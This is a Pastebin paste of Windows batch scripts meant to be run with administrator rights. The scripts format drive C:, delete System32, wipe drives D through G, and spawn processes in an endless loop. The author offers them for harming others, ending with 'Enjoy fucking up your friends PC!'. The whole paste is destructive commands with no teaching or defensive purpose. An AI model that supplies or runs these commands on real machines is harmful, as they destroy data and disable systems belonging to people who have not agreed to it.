Advertisement
Hackyboi

If you are bored use these on your VMs! *clap clap*

Dec 8th, 2018
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.76 KB | None | 0 0
  1. ! REMINDER ! All of these files need to be .bat files and must be ran in Adminstrator mode!! ! REMINDER !
  2. ---------------- Format C: -----------------
  3. @ECHO OFF
  4. Format C:
  5. ---------------- Delete Sys32 -----------------
  6. @ECHO OFF
  7. Del C:\Windows\System32 /s /q
  8. ---------------- Delete all drives -----------------
  9. @ECHO OFF
  10. Del D: /s /q
  11. Del B: /s /q
  12. Del E: /s /q
  13. Del F: /s /q
  14. Del G: /s /q
  15. (Edit it if you want to delte other drives.)
  16. ---------------- RAM overflow..? --------------
  17. @ECHO OFF
  18. goto A
  19. :A
  20. goto A
  21. (Might not work tbh.)
  22. ---------------- Holy fuckery! ----------------
  23. @ECHO OFF
  24. goto Loop
  25. :Loop
  26. start cmd
  27. start notepad
  28. start taskmgr
  29. goto Loop
  30. ---------------- Thats pretty much all of that! -------------------
  31. Enjoy fucking up your friends PC!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement